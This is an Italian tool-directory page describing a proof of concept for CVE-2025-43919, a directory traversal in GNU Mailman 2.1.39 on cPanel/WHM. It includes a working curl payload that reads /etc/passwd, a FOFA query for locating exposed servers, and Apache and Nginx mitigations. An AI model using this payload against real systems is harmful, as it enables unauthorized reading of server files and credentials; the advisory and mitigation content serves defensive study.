Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-43919-POC — Una nuova vulnerabilità è stata scoperta in GNU Mailman 2.1.39, incluso con cPanel/WHM, che consente ad attaccanti remoti non autenticati di leggere file arbitrari sul server tramite una falla di attraversamento delle directory. | Kitploit
Strumenti/GitHubGitHub/cybersecplayground/cve-2025-43919-poc
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubcybersecplayground/cve-2025-43919-poc

CVE-2025-43919-POC

Una nuova vulnerabilità è stata scoperta in GNU Mailman 2.1.39, incluso con cPanel/WHM, che consente ad attaccanti remoti non autenticati di leggere file arbitrari sul server tramite una falla di attraversamento delle directory.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
1111 anno faNon ancora revisionato
Condividi

🚨 CVE-2025-43919: Directory Traversal in GNU Mailman 2.1.39 (cPanel/WHM)

È stata scoperta una nuova vulnerabilità in GNU Mailman 2.1.39, in bundle con cPanel/WHM, che consente a utenti remoti non autenticati di leggere file arbitrari sul server tramite un difetto di directory traversal.

📌 Riepilogo della vulnerabilità:

  • Tipo: Directory Traversal (Non autenticato)
  • Componente: script CGI private.py
  • Endpoint interessato: /mailman/private/mailman
  • Impatto: Divulgazione di file come /etc/passwd, archivi .mbox e configurazioni di Mailman
  • Punteggio CVSS: 5.8 (Medio)
  • CVE ID: CVE-2025-43919

Stato: Nessuna patch ufficiale (Mailman 2.1.x è EOL)

🔥 Prova di concetto:

root@kitploit:~
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman

🧨 Scenari di sfruttamento:

  • Estrarre /etc/passwd, configurazioni o file di mailbox
  • Divulgare credenziali e archivi sensibili
  • Combinare con altri bug per RCE o escalation

🛡️ Mitigazioni: Bloccare l'accesso a /mailman/private a livello di server web:

root@kitploit:~
<Location "/mailman/private">
    Require ip 127.0.0.1
    Deny from all
</Location>

Oppure in Nginx:

root@kitploit:~
location /mailman/private {
    deny all;
    return 403;
}

⬆️ Migrare a Mailman 3.x — 2.x è EOL e manca di protezioni moderne

🔍 FOFA Query : app="Mailman"

📚 Scopri di più, condividi in modo responsabile e mantieni sicura la tua infrastruttura.

🔒 Segui per altri CVE reali, PoC concreti e suggerimenti di hardening: 👉 @cybersecplayground

#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity

Scarica lo strumento